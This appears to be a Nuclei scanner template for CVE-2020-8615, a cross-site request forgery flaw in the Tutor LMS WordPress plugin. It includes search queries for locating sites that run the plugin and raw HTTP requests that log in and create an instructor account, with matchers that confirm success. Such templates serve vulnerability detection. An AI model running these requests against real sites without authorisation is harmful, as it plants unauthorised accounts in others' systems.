id: CVE-2020-8615

info:
  name: Wordpress Plugin Tutor LMS 1.5.3 - Cross-Site Request Forgery
  author: r3Y3r53
  severity: medium
  description: |
    A CSRF vulnerability in the Tutor LMS plugin before 1.5.3 for WordPress can result in an attacker approving themselves as an instructor and performing other malicious actions (such as blocking legitimate instructors).
  impact: |
    Attackers can exploit CSRF to approve themselves as instructors or block legitimate instructors, potentially disrupting the learning management system.
  remediation: update to v.1.5.3
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2020-8615
    - https://wpscan.com/vulnerability/10058
    - http://packetstormsecurity.com/files/156585/WordPress-Tutor-LMS-1.5.3-Cross-Site-Request-Forgery.html
    - https://wpvulndb.com/vulnerabilities/10058
    - https://www.getastra.com/blog/911/plugin-exploit/cross-site-request-forgery-in-tutor-lms-plugin/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N
    cvss-score: 6.5
    cve-id: CVE-2020-8615
    cwe-id: CWE-352
    epss-score: 0.0867
    epss-percentile: 0.92608
    cpe: cpe:2.3:a:themeum:tutor_lms:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: themeum
    product: tutor_lms
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/tutor/
    fofa-query: body=/wp-content/plugins/tutor/
    publicwww-query: /wp-content/plugins/tutor/
  tags: cve,cve2020,wpscan,packetstorm,csrf,wp-plugin,wp,tutor,wordpress,themeum,vuln

variables:
  user: "{{rand_base(6)}}"
  pass: "{{rand_base(8)}}"
  email: "{{randstr}}@{{rand_base(5)}}.com"
  firstname: "{{rand_base(5)}}"
  lastname: "{{rand_base(5)}}"

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=add_new_instructor&first_name={{firstname}}&last_name={{lastname}}&user_login={{user}}&email={{email}}&phone_number=1231231231&password={{pass}}&password_confirmation={{pass}}&tutor_profile_bio=Et+tempore+culpa+n&action=tutor_add_instructor

    matchers:
      - type: dsl
        dsl:
          - 'contains(content_type_2, "application/json")'
          - 'contains(body_2, "success") && contains(body_2, "true") && contains(body_2, "Instructor has been added successfully")'
          - 'status_code_2 == 200'
        condition: and
# digest: 4b0a00483046022100c53f2c3ed9788981caa7495922f7233239a83d2dc797beaeec6e005ce13ff14a022100c257e142a52d7f38965d759954cc0a98d9d066ac381037ff1b8006fa4e472bc4:922c64590222798bb761d5b6d8e72950